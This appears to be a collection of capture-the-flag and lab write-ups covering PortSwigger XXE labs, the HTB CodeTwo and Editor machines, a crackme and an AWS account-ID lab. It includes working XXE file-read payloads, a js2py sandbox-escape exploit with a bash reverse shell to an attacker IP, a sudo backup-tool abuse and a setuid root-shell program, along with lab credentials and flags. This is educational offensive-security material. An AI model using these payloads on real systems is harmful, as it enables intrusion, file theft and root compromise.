<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

We grab the URL of exploit server where DTD is hosted by doing view exploit,

https://exploit-0a2600990353a94382bf975d01b700fb.exploit-server.net/exploit

Final XML Exploit which we send to server,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [

<!ENTITY % xxe SYSTEM "https://exploit-0a2600990353a94382bf975d01b700fb.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

it works and we got /etc/passwd directly in response with some error,

Lab 7: Exploiting XInclude to retrieve files

Here is the CheckStock req,

POST /product/stock HTTP/2
Host: 0a840013044f220085404bd2003c006a.web-security-academy.net
Cookie: session=q887Y0wxz5bGzcDsYRs8j6HCW9C7DpvJ
Content-Length: 21
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a840013044f220085404bd2003c006a.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a840013044f220085404bd2003c006a.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

productId=1&storeId=1

In this lab Because we don't control the entire XML document we can't define a DTD to launch a classic XXE attack.

[!hint] XInclude is part of the XML standard (XLink) that allows one XML document to include another external file.

so as per description, inject an XInclude statement to retrieve the contents of the /etc/passwd file
This tells the XML parser:
- "Before processing, fetch this file and include its contents here."

<xi:include href="other.xml" parse="xml" xmlns:xi="http://www.w3.org/2001/XInclude"/>

Here is actual payload,

<xi:include href="file:///etc/passwd" parse="text"
    xmlns:xi="http://www.w3.org/2001/XInclude" />

Here is what happens:
1. xi:include is recognized as an XInclude directive
2. The parser sees href="file:///etc/passwd"
3. It loads that file from the filesystem
4. The contents of /etc/passwd replace the <xi:include> tag
We will inject this payload into out parameters,

productId=<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="file:///etc/passwd" parse="text"/>&storeId=1

We got /etc/passwd and also solved the lab,

Lab 8: Exploiting XXE via image file upload

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

[!hint] The SVG image format uses XML.

Apache Batik :- A Java library used to render SVG images → converts them into raster graphics.
SVG is not just an image format — it is XML.
So when the server thinks it's processing an "image", Batik is actually parsing XML.
Here is the /post/comment endpoint request in which i tried upload below shell.svg with needed details.

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY hostname SYSTEM "file:///etc/hostname">
]>
<svg width="300" height="50"
     xmlns="http://www.w3.org/2000/svg"
     version="1.1">
  <text x="10" y="30" font-size="20">&hostname;</text>
</svg>

POST /post/comment HTTP/2
Host: 0ae500da04f5442b80fe357d00ae00a3.web-security-academy.net
Cookie: session=4CmpDnsIAE8Cpo9lDr1pZwDn36ZIXolm
Content-Length: 1073
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://0ae500da04f5442b80fe357d00ae00a3.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary49osAwipf2s1ka4j
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ae500da04f5442b80fe357d00ae00a3.web-security-academy.net/post?postId=1
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="csrf"

1ZCqa1BZYXkJHxYikDmxz9p3kbTM9fb7
------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="postId"

1
------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="comment"

SHELL
------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="name"

b14cky
------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="avatar"; filename="shell.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY hostname SYSTEM "file:///etc/hostname">
]>
<svg width="300" height="50"
     xmlns="http://www.w3.org/2000/svg"
     version="1.1">
  <text x="10" y="30" font-size="20">&hostname;</text>
</svg>

------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="email"

b14cky@b14cky.com
------WebKitFormBoundary49osAwipf2s1ka4j
Content-Disposition: form-data; name="website"


------WebKitFormBoundary49osAwipf2s1ka4j--

After that we can comment here, and when we open that image by left click on that small line we can see the hostname being parsed as image,
And by submitting this we solve the lab,

ca02670f9934

Lab 9: Lab: Exploiting XXE to retrieve data by repurposing a local DTD

To solve the lab, trigger an error message containing the contents of the /etc/passwd file.
We 'll need to reference an existing DTD file on the server and redefine an entity from it.

[!hint] Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

here is the /product/stock request,

POST /product/stock HTTP/2
Host: 0a4d00fd043c861785096a5f003c00b5.web-security-academy.net
Cookie: session=R0yEJiPTL22MkObAvejC94rcXXXCesDq
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a4d00fd043c861785096a5f003c00b5.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d00fd043c861785096a5f003c00b5.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

Here is the payload that we will use to dump /etc/passwd,
Loads a trusted DTD (docbookx.dtd)
Overrides a known parameter entity (ISOamso)
Overrides it with malicious parameter entities:
- file → loads /etc/passwd
- eval → constructs a new entity named error
- error → references invalid URL containing file contents → triggers SAX error showing /etc/passwd
The parser re-expands everything, hits the invalid entity → throws error → reveals file content.

<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

HTB Machine CodeTwo Aug 2025

Wed, 27 Aug 2025 00:00:00 GMT

Scanning

Rustscan - Initial Port Discovery

Our initial reconnaissance revealed two open ports on the target machine:
- Port 22 - SSH service (standard secure shell access)
- Port 8000 - HTTP service (likely a web application)
This limited attack surface suggests a focused approach will be most effective.

Nmap - Detailed Service Enumeration

# Nmap 7.94SVN scan initiated Wed Aug 27 21:10:14 2025 as: nmap -sC -sV -p22,8000 -oA nmap/initials -Pn 10.10.11.82
Nmap scan report for codetwo.htb (10.10.11.82)
Host is up (0.32s latency).

PORT     STATE SERVICE   VERSION
22/tcp   open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open  http-alt?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 27 21:13:22 2025 -- 1 IP address (1 host up) scanned in 187.64 seconds

Key Findings:
- SSH Service: OpenSSH 8.2p1 running on Ubuntu (relatively secure version)
- HTTP Service: Non-standard port 8000 hosting an unknown web application
- Operating System: Ubuntu Linux system

Enumeration Phase

Web Application Analysis (Port 8000)

The web application presents a clean interface with three primary features:
- Login System - User authentication mechanism
- Registration Portal - New user account creation
- Download App - Source code distribution feature
This combination suggests a code-sharing or development platform.

Initial Access Strategy

I created test credentials using the username user and password user to gain legitimate access to the application.
This allowed me to explore the authenticated features without triggering security mechanisms.

Authenticated Access Revealed:
- Dashboard URL: http://10.10.11.82:8000/dashboard - Main user interface
- Download URL: http://10.10.11.82:8000/download - Source code access

Source Code Analysis

The /download endpoint provided the complete application source code in app.zip.
This invaluable resource allowed for white-box security analysis and vulnerability identification.

JavaScript Console Discovery

The /dashboard endpoint revealed an interactive JavaScript execution environment - a critical security feature that immediately caught my attention.

This JavaScript console allows users to execute arbitrary JavaScript code, which presents a significant attack surface if not properly sandboxed.

Exploitation Phase

Source Code Vulnerability Assessment

After extracting and analyzing the downloaded source code, I identified a critical vulnerability involving the js2py Python module. Here's the complete Flask application code:

from flask import Flask, render_template, request, redirect, url_for, session, jsonify, send_from_directory
from flask_sqlalchemy import SQLAlchemy
import hashlib
import js2py
import os
import json

js2py.disable_pyimport()
app = Flask(__name__)
app.secret_key = 'S3cr3tK3yC0d3Tw0'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password_hash = db.Column(db.String(128), nullable=False)

class CodeSnippet(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    code = db.Column(db.Text, nullable=False)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/dashboard')
def dashboard():
    if 'user_id' in session:
        user_codes = CodeSnippet.query.filter_by(user_id=session['user_id']).all()
        return render_template('dashboard.html', codes=user_codes)
    return redirect(url_for('login'))

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        password_hash = hashlib.md5(password.encode()).hexdigest()
        new_user = User(username=username, password_hash=password_hash)
        db.session.add(new_user)
        db.session.commit()
        return redirect(url_for('login'))
    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        password_hash = hashlib.md5(password.encode()).hexdigest()
        user = User.query.filter_by(username=username, password_hash=password_hash).first()
        if user:
            session['user_id'] = user.id
            session['username'] = username;
            return redirect(url_for('dashboard'))
        return "Invalid credentials"
    return render_template('login.html')

@app.route('/logout')
def logout():
    session.pop('user_id', None)
    return redirect(url_for('index'))

@app.route('/save_code', methods=['POST'])
def save_code():
    if 'user_id' in session:
        code = request.json.get('code')
        new_code = CodeSnippet(user_id=session['user_id'], code=code)
        db.session.add(new_code)
        db.session.commit()
        return jsonify({"message": "Code saved successfully"})
    return jsonify({"error": "User not logged in"}), 401

@app.route('/download')
def download():
    return send_from_directory(directory='/home/app/app/static/', path='app.zip', as_attachment=True)

@app.route('/delete_code/<int:code_id>', methods=['POST'])
def delete_code(code_id):
    if 'user_id' in session:
        code = CodeSnippet.query.get(code_id)
        if code and code.user_id == session['user_id']:
            db.session.delete(code)
            db.session.commit()
            return jsonify({"message": "Code deleted successfully"})
        return jsonify({"error": "Code not found"}), 404
    return jsonify({"error": "User not logged in"}), 401

@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

if __name__ == '__main__':
    with app.app_context():
        db.create_all()
    app.run(host='0.0.0.0', debug=True)

CVE-2024-28397: js2py Sandbox Escape Vulnerability

My research revealed a critical vulnerability in the js2py library that allows sandbox escape and remote code execution.
I found an excellent proof-of-concept from the CVE-2024-28397-js2py-Sandbox-Escape POC repository.

Understanding the js2py Vulnerability

What is js2py?
- js2py is a Python package designed to safely evaluate JavaScript code within Python interpreters
- It's commonly used by web scrapers to parse and execute JavaScript found on websites
- The library includes security measures like js2py.disable_pyimport() to prevent code escape
The Critical Flaw:
- A vulnerability exists in the implementation of global variables within js2py
- Attackers can obtain references to Python objects within the js2py environment
- This allows complete escape from the JavaScript sandbox
- Remote code execution becomes possible despite security restrictions
Attack Scenarios:
- Malicious websites can host JavaScript files that exploit this vulnerability
- HTTP APIs accepting JavaScript code become vectors for remote code execution
Any application using js2py to process untrusted JavaScript is vulnerable

Exploitation Development

I modified the original proof-of-concept to include a reverse shell payload targeting my attack machine:

let cmd = "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.76/1337 0>&1'"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11

Payload Breakdown:
- Line 1: Defines the reverse shell command targeting my listener
- Lines 2-7: Establishes access to Python object references through JavaScript
- Lines 9-18: Locates the Python subprocess.Popen class for command execution
- Line 20: Executes the reverse shell command using the discovered Popen class

Gaining Initial Access

I established a netcat listener on port 1337 and executed the malicious JavaScript payload through the web application's console interface.

The payload executed successfully through the dashboard interface:

Success! The reverse shell connected immediately, providing access as the app service account:

Database Credential Extraction

The application source code revealed critical database configuration details:

js2py.disable_pyimport()
app = Flask(__name__)
app.secret_key = 'S3cr3tK3yC0d3Tw0'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)

SQLite Database Analysis

I located the SQLite database file at /app/instance/users.db and extracted the user credentials:

Database Contents:

marco | 649c9d65a206a75f5abe509fe128bce5
app   | a97588c0e2fa3a024876339e27aeb42e

Password Cracking

Using John the Ripper, I successfully cracked the MD5 hashes:

Cracked Credentials:
- Username: marco
- Password: sweetangelbabylove

SSH Access and User Flag

With the recovered credentials, I successfully authenticated via SSH:

User Flag Retrieved:

a90eb8b312927f4bf9f56831b4af4d82

Post-Exploitation and Privilege Escalation

Sudo Privileges Assessment

I examined the user's sudo privileges to identify potential escalation vectors:

Critical Discovery: The user marco can execute /usr/local/bin/npbackup-cli with full sudo privileges without password authentication.

NPBackup Analysis

NPBackup is a comprehensive backup solution available at https://github.com/netinvent/npbackup. The tool provides extensive backup and restore capabilities, including:

Key Command Options:
- -b flag: Initiates backup operations
- -f flag: Forces backup execution without prompts
- Configuration-driven backup processes

Configuration File Analysis

The backup tool relies on npbackup.conf for operational parameters. I copied this configuration to /tmp for modification:

conf_version: 3.0.1
audience: public
repos:
  default:
    repo_uri:     __NPBACKUP__wd9051w9Y0p4ZYWmIxMqKHP81/phMlzIOYsL01M9Z7IxNzQzOTEwMDcxLjM5NjQ0Mg8PDw8PDw8PDw8PDw8PD6yVSCEXjl8/9rIqYrh8kIRhlKm4UPcem5kIIFPhSpDU+e+E__NPBACKUP__
    repo_group: default_group
    backup_opts:
      paths:
      - /home/app/app/
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password:       __NPBACKUP__v2zdDN21b0c7TSeUZlwezkPj3n8wlR9Cu1IJSMrSctoxNzQzOTEwMDcxLjM5NjcyNQ8PDw8PDw8PDw8PDw8PD0z8n8DrGuJ3ZVWJwhBl0GHtbaQ8lL3fB0M=__NPBACKUP__
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  default_group:
    backup_opts:
      paths: []
      source_type:
      stdin_from_command:
      stdin_filename:
      tags: []
      compression: auto
      use_fs_snapshot: true
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files:
      - excludes/generic_excluded_extensions
      - excludes/generic_excludes
      - excludes/windows_excludes
      - excludes/linux_excludes
      exclude_patterns: []
      exclude_files_larger_than:
      additional_parameters:
      additional_backup_only_parameters:
      minimum_backup_size_error: 10 MiB
      pre_exec_commands: []
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password:
      repo_password_command:
      minimum_backup_age: 1440
      upload_speed: 800 Mib
      download_speed: 0 Mib
      backend_connections: 0
      retention_policy:
        last: 3
        hourly: 72
        daily: 30
        weekly: 4
        monthly: 12
        yearly: 3
        tags: []
        keep_within: true
        group_by_host: true
        group_by_tags: true
        group_by_paths: false
        ntp_server:
      prune_max_unused: 0 B
      prune_max_repack_size:
    prometheus:
      backup_job: ${MACHINE_ID}
      group: ${MACHINE_GROUP}
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: ${HOSTNAME}__blw0
  machine_group:
global_prometheus:
  metrics: false
  instance: ${MACHINE_ID}
  destination:
  http_username:
  http_password:
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url:
  auto_upgrade_server_username:
  auto_upgrade_server_password:
  auto_upgrade_host_identity: ${MACHINE_ID}
  auto_upgrade_group: ${MACHINE_GROUP}

Privilege Escalation Strategy

I modified the configuration file to target the /root directory instead of the default application path:

paths:
      - /root

Root Access Execution

Step 1: Execute Backup with Modified Configuration

sudo /usr/local/bin/npbackup-cli -c npbackup.conf -b -f

Step 2: Extract Root Flag Using Dump Feature

sudo /usr/local/bin/npbackup-cli -c npbackup.conf --dump /root/root.txt

Root Flag Successfully Retrieved:

e7ff41c9ff2b0ae691783c04259b6e2a

Attack Summary and Key Takeaways

This penetration test demonstrated a complete compromise chain from initial reconnaissance to full root access:

Information Gathering: Port scanning revealed limited attack surface
Web Application Analysis: Source code disclosure provided critical vulnerability intelligence
Vulnerability Exploitation: CVE-2024-28397 in js2py enabled initial access
Lateral Movement: Database credential extraction facilitated user account compromise
Privilege Escalation: Misconfigured sudo permissions allowed root access through backup tool abuse

HTB Machine Editor August 2025

Thu, 14 Aug 2025 00:00:00 GMT

Scanning

Rustscan

Rustscan revealed three open ports:
- 22 – SSH
- 80 – HTTP service on the root domain (editor.htb)
- 8080 – Another HTTP service running on a subdomain (wiki.editor.htb)

Nmap

# Nmap 7.94SVN scan initiated Thu Aug 14 10:38:27 2025 as: 
nmap -Pn -p- --min-rate 2000 -sC -sV -oA nmap/initials -vvv 10.10.11.80

Increasing send delay for 10.10.11.80 from 0 to 5 due to 14 out of 45 dropped probes...
...
Nmap scan report for wiki.editor.htb (10.10.11.80)
Host is up, received user-set (0.31s latency).
Scanned at 2025-08-14 10:38:27 IST for 281s
Not shown: 34463 closed tcp ports (conn-refused), 31069 filtered tcp ports (no-response)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  tcpwrapped syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp   open  tcpwrapped syn-ack
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  tcpwrapped syn-ack
|_http-server-header: Jetty(10.0.20)

The Nmap scan confirms what Rustscan reported, but also provides additional details about the services running behind these ports.

Enumeration

Port 80 (http://editor.htb)
- The page looked like a typical static website with nothing particularly interesting.

Port 8080 (http://wiki.editor.htb/)
- This page revealed that the service is running XWiki Debian 15.10.8.
- From here, the natural next step was to look for known vulnerabilities or exploits affecting this specific version.

Exploitation

After some quick searching, I discovered that this version of XWiki is vulnerable to RCE (Remote Code Execution).
I found a working POC and decided to adapt it for my target.

Setting up the POC

I customized the exploit with target-specific details.

Testing a simple command like id gave me a valid response, confirming command execution worked.

Getting a Service Reverse Shell

I then moved on to getting a reverse shell for a more stable foothold.

To make the shell interactive and stable, I upgraded it using:

/bin/bash -i

Post-Exploitation Enumeration

My initial thought was to look for hardcoded credentials, since many easy boxes hide passwords in common configuration files.
I asked GPT for common file names, and it pointed me to hibernate.cfg.xml.

The file existed on the system:

Inside, I found the following credentials:

<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>

So, the credentials were:
- Username: xwiki
- Password: theEd1t0rTeam99
These looked like database credentials, so I attempted to log into MySQL using them.

Accessing MySQL

mysql -u xwiki -p xwiki
Enter password: theEd1t0rTeam99

I successfully logged in and enumerated the databases and tables.

Unfortunately, while I could explore the xwiki database, the table xwikiusers didn’t exist. So no direct user creds were available from MySQL.

Thinking Outside the Box

At this point, I stepped back and thought about password reuse.
I already knew of a system user named oliver. Out of curiosity, I tried:

oliver : theEd1t0rTeam99

And surprisingly, it worked! 🎉
This confirmed a password reuse vulnerability. While it may look like guesswork, this is actually very realistic, since many real-world systems fall victim to reused credentials.

Getting User Shell via SSH

Using the reused password, I logged in as oliver via SSH and captured the user flag.

91955630da7c314861c7b745f8c22a70

Post Exploitation

I proceeded with typical privilege escalation checks:
- Running sudo -l
- Searching for SUID binaries
- Checking network connections

At first, nothing looked promising. I also tried kernel exploits for Linux editor 5.15.0-151-generic, but none of them worked.

So, I switched to linpeas for a deeper scan.

Interestingly, I discovered an unusual SUID binary called ndsudo. I had overlooked it earlier, but this was clearly the key to privilege escalation.

Understanding the Binary

I examined ndsudo to understand its purpose. It allowed running specific commands, but it wasn’t a standard privilege escalation tool.

After digging deeper (with GPT’s help), I found that it was vulnerable to CVE-2024-32019. A public POC was available: CVE-2024-32019-POC.
Although I didn’t use the exact exploit, I used it as inspiration.

Gaining Root Shell

I created a small C program that forces the UID and GID to root, then spawns a shell:

#include <unistd.h>  // setuid, setgid, execl
#include <stddef.h>  // NULL

int main() {
    setuid(0);   // force UID to root
    setgid(0);   // force GID to root group
    execl("/bin/bash", "bash", NULL);
    return 0;
}

Compiled it with:

x86_64-linux-gnu-gcc -o nvme exploit.c -static

Then transferred it to the target, made it executable, and exploited the PATH injection trick by modifying $PATH:

PATH=$(pwd):$PATH

Finally, I executed ndsudo with my custom binary and popped a root shell. 🚀

Crackme - TeRrArIsT's Easy, but interesting for novice August 2025

Wed, 13 Aug 2025 00:00:00 GMT

Challenge Info

File Info

This is a 64-bit executable file.

Testing Inputs

I started by testing with the string "TEST" as input.
The program responded with Access Denied, which suggests it’s validating the input against a different, predefined string. We can clearly observe this in IDA.

IDA View:

Pseudocode (IDA-generated):

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char Str2[8]; // [rsp+21h] [rbp-2Fh] BYREF
  _BYTE v5[7]; // [rsp+29h] [rbp-27h] BYREF
  char Str1[32]; // [rsp+30h] [rbp-20h] BYREF

  _main(argc, argv, envp);
  *(_DWORD *)v5 = 1129925455;
  *(_DWORD *)&v5[3] = 421010243;
  decrypt(Str2, v5, 42, 7);
  _mingw_printf("Enter password: ");
  _mingw_scanf("%31s", Str1);
  if ( !strcmp(Str1, Str2) )
    puts("Access granted!");
  else
    puts("Access denied!");
  getch();
  return 0;
}

To investigate further, I used x64dbg and began searching for static strings that could help in pinpointing the password verification logic.
Examples include:
1. "Access granted!"
2. "Access denied!"
3. References to strcmp
4. Other suspicious instructions that might hint at password handling.

After setting breakpoints, I ran the program until it hit the relevant instruction.

At this point, I entered the test input string: JEEL.

I then continued execution to the section where the string comparison occurs.
These instructions are particularly interesting because they load the two strings into registers before the strcmp call:
- First string → RDX (the user’s input)
- Second string → RAX (the stored, correct password)

strcmp Call Instruction:

Register values at the moment of comparison:
- User’s input: "JEEL"
- Stored password: "easi123" — which is the correct key/flag for the program.

Pwnedlabs Machine Identify the AWS Account ID from a Public S3 Bucket June 2025

Thu, 12 Jun 2025 00:00:00 GMT

Scenario

The ability to expose and leverage even the smallest oversights is a coveted skill in cybersecurity.
A global Logistics Company has reached out to our cybersecurity firm for assistance and provided the IP address of their website.
Objective: Start the engagement and use this IP address to identify their AWS account ID via a public S3 bucket to commence the enumeration process.

Real-World Context & Impact

Understanding the significance of AWS Account ID exposure is crucial for both attackers and defenders:

Attack Vectors with AWS Account ID:

IAM User/Role Enumeration: Threat actors can identify IAM roles and users tied to the account by exploiting detailed error messages from AWS services
Username/Role Verification: AWS returns different error messages for non-existent vs. existing usernames/roles, allowing attackers to compile target lists
Public Resource Discovery: Filter public EBS and RDS snapshots by AWS Account ID ownership
Cross-Account Resource Access: Attempt to access misconfigured resources that allow cross-account permissions
Social Engineering: Use legitimate-looking AWS account information for targeted phishing campaigns

Why This Matters:

AWS Account IDs are meant to be semi-sensitive identifiers
Once obtained, they provide a foundation for further AWS-specific reconnaissance
Many organizations unknowingly expose these through misconfigured S3 buckets, CloudTrail logs, or web applications

Scanning

Rust Scan

Initially attempted to use rustscan on the target IP, but the tool became unresponsive and failed to provide nmap output
This is a common issue with some network configurations or when targets have specific firewall rules

rustscan -a 54.204.171.32 -b 100 -- -A

Nmap

Proceeded with manual nmap scanning to identify open services:

nmap -T5 -A -p80 -oA nmap/80 54.204.171.32 -Pn

Scan Results Analysis:

Target is running Apache HTTP Server version 2.4.52
Port 80 is open and serving web content
Used -Pn flag to skip host discovery (ping) as the target might be blocking ICMP packets
The -A flag enables OS detection, version detection, script scanning, and traceroute

AWS Configuration

Provided Credentials

The engagement provided the following AWS credentials:

IP address: 54.204.171.32
Access key ID: AKIAWHEOTHRFW4CEP7HK
Secret access key: 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

AWS CLI Setup

Installing and configuring AWS CLI with the provided credentials:

sudo apt install awscli
aws configure

Configuration Details:

Access Key ID: The public identifier for the AWS user
Secret Access Key: The private key used for authentication
Default region: Set to us-east-1 (common default)
Output format: JSON for structured responses

Credential Verification

Verifying the credentials are valid and functional:

aws sts get-caller-identity

Response Analysis:

{
    "UserId": "AIDAWHEOTHRF62U7I6AWZ",
    "Account": "427648302155",
    "Arn": "arn:aws:iam::427648302155:user/s3user"
}

This reveals:

UserId: Unique identifier for the IAM user
Account: AWS Account ID (427648302155) - this is the account that owns these credentials
Arn: Amazon Resource Name showing this is an IAM user named "s3user"

S3 Bucket Discovery & Enumeration

Web Application Analysis

Browsing to the target IP reveals a web application:

Source Code Inspection

Examining the HTML source code reveals references to an S3 bucket named mega-big-tech:

Why Check Source Code:

Web applications often reference cloud storage directly in HTML/CSS/JavaScript
S3 bucket names must be globally unique, making them valuable intelligence
Static assets (images, CSS, JS) are commonly served from S3 buckets

S3 Bucket Content Enumeration

Listing files in the discovered S3 bucket:

aws s3 ls s3://mega-big-tech --recursive --no-sign-request

Command Breakdown:

--recursive: Lists all objects in subdirectories
--no-sign-request: Attempts anonymous access (for public buckets)
Results show typical web assets (images, stylesheets)

Account ID Discovery Challenges

Initial Research & Attempts

The goal was to find the AWS Account ID associated with the S3 bucket, not just the credentials we were given.

First Attempt - Manual Techniques:

Researched various methodologies for S3 bucket account ID discovery
Found article: https://tracebit.com/blog/how-to-find-the-aws-account-id-of-any-s3-bucket
Attempted the suggested scripts but encountered issues

Second Attempt - Automated Tools:

Tried GitHub tool: https://github.com/WeAreCloudar/s3-account-search
Provided ARN and role information but still encountered problems
This tool uses IAM role assumption techniques to extract account information

Learning Moment

After multiple failed attempts, I consulted writeup hints to understand the correct approach 😗
This is a common part of the learning process in cybersecurity - sometimes you need guidance to understand advanced techniques

The Solution - S3 Account Search Tool

Discovering the Hint

From the lab documentation:

💡 The flag in this lab is the AWS account ID associated with the S3 bucket. The IAM user credentials are provided, and the role you can assume is named arn:aws:iam::427648302155:role/LeakyBucket

Understanding the Technique

The technique involves:

IAM Role Assumption: Using the provided credentials to assume a role
Error Message Analysis: AWS returns different errors for valid vs. invalid account IDs
Brute Force Enumeration: Systematically testing account ID possibilities

Technical Deep Dive: How S3 Account Search Works

The s3-account-search tool exploits AWS's verbose error messaging:

Role Assumption Attempt: Tries to assume a role in different AWS accounts
Error Message Analysis:
- Invalid account ID: "No such account exists"
- Valid account ID but no permission: "Access denied" or similar
- Valid account ID with misconfigured permissions: May succeed
Pattern Recognition: Different AWS services return subtly different error messages that can reveal account existence

Successful Enumeration

pip install s3-account-search
s3-account-search arn:aws:iam::427648302155:role/LeakyBucket s3://mega-big-tech

Command Explanation:

Uses the LeakyBucket role in account 427648302155
Targets the mega-big-tech S3 bucket
Leverages cross-account role assumption techniques

Result:

AccountId: 107513503799

Technical Analysis: Why This Works

AWS IAM Role Assumption Process

Cross-Account Roles: AWS allows roles to be assumed across account boundaries
Trust Policies: The LeakyBucket role likely has a trust policy allowing the s3user to assume it
